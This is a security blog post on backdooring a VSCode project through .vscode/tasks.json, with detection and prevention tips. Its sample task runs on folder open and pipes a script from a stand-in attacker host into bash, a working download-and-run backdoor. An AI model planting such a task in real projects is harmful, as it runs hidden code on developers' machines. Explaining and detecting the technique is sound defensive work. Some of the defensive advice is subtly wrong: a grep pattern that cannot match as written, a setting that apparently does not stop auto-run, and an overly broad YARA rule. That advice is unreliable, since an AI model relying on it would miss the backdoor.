Backdooring a VSCode Project via vscode/tasksjson

By /

Listen to this Post

Featured Image
Visual Studio Code (VSCode) allows automatic task execution via the `tasks.json` file, which can be exploited to create a stealthy backdoor. Attackers targeting developers or exploit departments can abuse this feature to execute arbitrary code when a project folder is opened.

How the Attack Works

1. Malicious `tasks.json` Setup:

An attacker modifies or creates a `.vscode/tasks.json` file in a project directory with a predefined command that executes a malicious payload.

Example `tasks.json`:

{
"version": "2.0.0",
"tasks": [
{
"label": "Malicious Task",
"type": "shell",
"command": "bash -c 'curl http://attacker.com/mal.sh | bash'",
"runOptions": {
"runOn": "folderOpen"
}
}
]
}

2. Automatic Execution:

When the victim opens the infected project in VSCode, the task runs automatically, triggering the malicious payload.

3. Persistence & Evasion:

Since `.vscode/` is a standard directory, this technique remains hidden unless manually inspected.

You Should Know: Detecting & Preventing This Attack

Detection Methods

  • Check `tasks.json` for Suspicious Commands:
    cat .vscode/tasks.json | grep -i "curl|wget|bash|powershell"

  • Audit VSCode Extensions & Configs:

    ls -la ~/.vscode/extensions/

  • Monitor Process Execution:

    ps aux | grep -E "curl|wget|bash|sh|python"

Prevention Steps

1. Disable Auto-Run Tasks:

  • Go to VSCode Settings (Ctrl + ,) → Search `task.autoDetect` → Set to off.

2. Restrict File Permissions:

chmod -R 750 .vscode/

3. Use Security Tools:

  • YARA Rule for Malicious tasks.json:
    rule vscode_malicious_task {
strings:
$curl = "curl" nocase
$wget = "wget" nocase
$bash = "bash" nocase
condition:
any of them
}

4. Verify Project Integrity:

git log -p .vscode/tasks.json  For Git projects

Expected Output

If a malicious `tasks.json` is present, running detection commands should reveal suspicious code execution attempts.

What Undercode Say

This attack vector demonstrates how development environments can be weaponized. Developers must:
– Audit configurations (grep -r "runOn" .vscode/).
– Use isolated environments (Docker, VMs) for untrusted projects.
– Monitor child processes (strace -f -e execve code .).

Linux & Windows Commands for Further Analysis:

 Linux: Check running VSCode processes 
ps -ef | grep -i "code"

Windows: Detect malicious tasks 
Get-Content .vscode\tasks.json | Select-String "curl|wget|powershell"

Linux: Network monitoring 
sudo tcpdump -i any -n port 80 or port 443

Windows: Process monitoring 
Get-WmiObject Win32_Process | Where-Object { $_.CommandLine -match "curl|wget" }

Prediction

As DevSecOps grows, attackers will increasingly target CI/CD pipelines and IDE configurations. Future variants may exploit VSCode extensions or debug configurations.

Expected Output:

  • Detection of unauthorized task executions.
  • Prevention of automatic code execution via secure configurations.

Reference:

IT/Security Reporter URL:

Reported By: Saad Ahla – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: